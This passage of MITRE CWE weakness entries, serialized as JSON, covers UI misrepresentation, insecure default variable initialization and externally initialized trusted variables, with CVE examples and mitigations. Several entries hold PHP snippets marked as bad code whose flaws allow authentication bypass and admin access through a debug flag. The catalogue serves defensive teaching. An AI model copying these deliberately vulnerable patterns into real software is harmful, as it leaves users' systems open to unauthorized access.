user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Remove the obsolete feature from the UI. Warn the user that the feature is no longer supported."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obsolete feature in UI"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"449":{"attr":{"@_ID":"449","@_Name":"The UI Performs the Wrong Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The UI performs the wrong action with respect to the user\'s request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform extensive functionality testing of the UI. The UI should behave as specified."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1387","Description":"Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2001-0081","Description":"Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0081"},{"Reference":"CVE-2002-1977","Description":"Product does not \\"time out\\" according to user specification, leaving sensitive data available after it has expired.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1977"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"The UI performs the wrong action"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"450":{"attr":{"@_ID":"450","@_Name":"Multiple Interpretations of UI Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"357","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretations of UI Input"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"451":{"attr":{"@_ID":"451","@_Name":"User Interface (UI) Misrepresentation of Critical Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.","Extended_Description":{"xhtml:p":["If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event.","UI misrepresentation can take many forms:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Incorrect indicator: incorrect information is displayed, which prevents the user from understanding the true state of the software or the environment the software is monitoring, especially of potentially-dangerous conditions or operations. This can be broken down into several different subtypes.","Overlay: an area of the display is intended to give critical information, but another process can modify the display by overlaying another element on top of it. The user is not interacting with the expected portion of the user interface. This is the problem that enables clickjacking attacks, although many other types of attacks exist that involve overlay.","Icon manipulation: the wrong icon, or the wrong color indicator, can be influenced (such as making a dangerous .EXE executable look like a harmless .GIF)","Timing: the software is performing a state transition or context switch that is presented to the user with an indicator, but a race condition can cause the wrong indicator to be used before the product has fully switched context. The race window could be extended indefinitely if the attacker can trigger an error.","Visual truncation: important information could be truncated from the display, such as a long filename with a dangerous extension that is not displayed in the GUI because the malicious portion is truncated. The use of excessive whitespace can also cause truncation, or place the potentially-dangerous indicator outside of the user\'s field of view (e.g. \\"filename.txt .exe\\"). A different type of truncation can occur when a portion of the information is removed due to reasons other than length, such as the accidental insertion of an end-of-input marker in the middle of an input, such as a NUL byte in a C-style string.","Visual distinction: visual information might be presented in a way that makes it difficult for the user to quickly and correctly distinguish between critical and unimportant segments of the display.","Homographs: letters from different character sets, fonts, or languages can appear very similar (i.e. may be visually equivalent) in a way that causes the human user to misread the text (for example, to conduct phishing attacks to trick a user into visiting a malicious web site with a visually-similar name as a trusted site). This can be regarded as a type of visual distinction issue."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"346","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform data validation (e.g. syntax, length, etc.) before interpreting the data."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Create a strategy for presenting information, and plan for how to display unusual characters."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2227","Description":"Web browser\'s filename selection dialog only shows the beginning portion of long filenames, which can trick users into launching executables with dangerous extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2227"},{"Reference":"CVE-2001-0398","Description":"Attachment with many spaces in filename bypasses \\"dangerous content\\" warning and uses different icon. Likely resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0398"},{"Reference":"CVE-2001-0643","Description":"Misrepresentation and equivalence issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0643"},{"Reference":"CVE-2005-0593","Description":"Lock spoofing from several different weaknesses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0593"},{"Reference":"CVE-2004-1104","Description":"Incorrect indicator: web browser can be tricked into presenting the wrong URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1104"},{"Reference":"CVE-2005-0143","Description":"Incorrect indicator: Lock icon displayed when an insecure page loads a binary file loaded from a trusted site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0143"},{"Reference":"CVE-2005-0144","Description":"Incorrect indicator: Secure \\"lock\\" icon is presented for one channel, while an insecure page is being simultaneously loaded in another channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0144"},{"Reference":"CVE-2004-0761","Description":"Incorrect indicator: Certain redirect sequences cause security lock icon to appear in web browser, even when page is not encrypted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0761"},{"Reference":"CVE-2004-2219","Description":"Incorrect indicator: Spoofing via multi-step attack that causes incorrect information to be displayed in browser address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219"},{"Reference":"CVE-2004-0537","Description":"Overlay: Wide \\"favorites\\" icon can overlay and obscure address bar","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0537"},{"Reference":"CVE-2005-2271","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2271"},{"Reference":"CVE-2005-2272","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2272"},{"Reference":"CVE-2005-2273","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2273"},{"Reference":"CVE-2005-2274","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2274"},{"Reference":"CVE-2001-1410","Description":"Visual distinction: Browser allows attackers to create chromeless windows and spoof victim\'s display using unprotected Javascript method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1410"},{"Reference":"CVE-2002-0197","Description":"Visual distinction: Chat client allows remote attackers to spoof encrypted, trusted messages with lines that begin with a special sequence, which makes the message appear legitimate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0197"},{"Reference":"CVE-2005-0831","Description":"Visual distinction: Product allows spoofing names of other users by registering with a username containing hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0831"},{"Reference":"CVE-2003-1025","Description":"Visual truncation: Special character in URL causes web browser to truncate the user portion of the \\"user@domain\\" URL, hiding real domain in the address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025"},{"Reference":"CVE-2005-0243","Description":"Visual truncation: Chat client does not display long filenames in file dialog boxes, allowing dangerous extensions via manipulations including (1) many spaces and (2) multiple file extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243"},{"Reference":"CVE-2005-1575","Description":"Visual truncation: Web browser file download type can be hidden using whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1575"},{"Reference":"CVE-2004-2530","Description":"Visual truncation: Visual truncation in chat client using whitespace to hide dangerous file extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2530"},{"Reference":"CVE-2005-0590","Description":"Visual truncation: Dialog box in web browser allows user to spoof the hostname via a long \\"user:pass\\" sequence in the URL, which appears before the real hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0590"},{"Reference":"CVE-2004-1451","Description":"Visual truncation: Null character in URL prevents entire URL from being displayed in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1451"},{"Reference":"CVE-2004-2258","Description":"Miscellaneous -- [step-based attack, GUI] -- Password-protected tab can be bypassed by switching to another tab, then back to original tab.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2258"},{"Reference":"CVE-2005-1678","Description":"Miscellaneous -- Dangerous file extensions not displayed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1678"},{"Reference":"CVE-2002-0722","Description":"Miscellaneous -- Web browser allows remote attackers to misrepresent the source of a file in the File Download dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0722"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UI Misrepresentation of Critical Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-434","@_Section":"7.16. Foil Semantic Attacks"}}},"Notes":{"Note":[{"#text":"This entry should be broken down into more precise entries. See extended description.","attr":{"@_Type":"Maintenance"}},{"#text":"Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-13","Modification_Importance":"Critical","Modification_Comment":"Defined several different subtypes of this issue."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, Other_Notes, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"UI Misrepresentation of Critical Information","attr":{"@_Date":"2014-02-18"}}}},"453":{"attr":{"@_ID":"453","@_Name":"Insecure Default Variable Initialization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, by default, initializes an internal variable with an insecure or less secure value than is possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to login a user using credentials from a POST request:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (login_user($user,$pass)) {}if ($authorized) {}","xhtml:br":["","","","",""],"xhtml:i":["// $user and $pass automatically set from POST request","..."],"xhtml:div":[{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_POST[\'user\'];$pass = $_POST[\'pass\'];$authorized = false;if (login_user($user,$pass)) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"..."}}],"Body_Text":["Because the $authorized variable is never initialized, PHP will automatically set $authorized to any value included in the POST request if register_globals is enabled. An attacker can send a POST request with an unexpected third value \'authorized\' set to \'true\' and gain authorized status without supplying valid credentials.","Here is a fixed version:","This code avoids the issue by initializing the $authorized variable to false and explicitly retrieving the login credentials from the $_POST variable. Regardless, register_globals should never be enabled and is disabled by default in current versions of PHP."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure default variable initialization"}},"Notes":{"Note":{"#text":"This overlaps other categories, probably should be split into separate items.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"454":{"attr":{"@_ID":"454","@_Name":"External Initialization of Trusted Variables or Data Stores","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.","Extended_Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"456","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary."},{"Phase":"Architecture and Design","Description":"Avoid any external control of variables. If necessary, restrict the variables that can be modified using an allowlist, and use a different namespace or naming convention if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the Java example below, a system property controls the debug level of the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int debugLevel = Integer.getInteger(\\"com.domain.application.debugLevel\\").intValue();"},"Body_Text":"If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases."},{"Intro_Text":"This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$debugEnabled = false;if ($_POST[\\"debug\\"] == \\"true\\"){}function login($username, $password){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"$debugEnabled = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"if($debugEnabled){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \'Debug Activated\';phpinfo();$isAdmin = True;return True;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}],"xhtml:i":"/.../"}},"Body_Text":["Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. .","This example also exhibits Information Exposure Through Debug Information (CWE-215)"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0959","Description":"Does not clear dangerous environment variables, enabling symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0959"},{"Reference":"CVE-2001-0033","Description":"Specify alternate configuration directory in environment variable, enabling untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0033"},{"Reference":"CVE-2001-0872","Description":"Dangerous environment variable not cleansed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0872"},{"Reference":"CVE-2001-0084","Description":"Specify arbitrary modules using environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External initialization of trusted variables or values"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Notes":{"Note":[{"#text":"Overlaps Missing variable initialization, especially in PHP.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 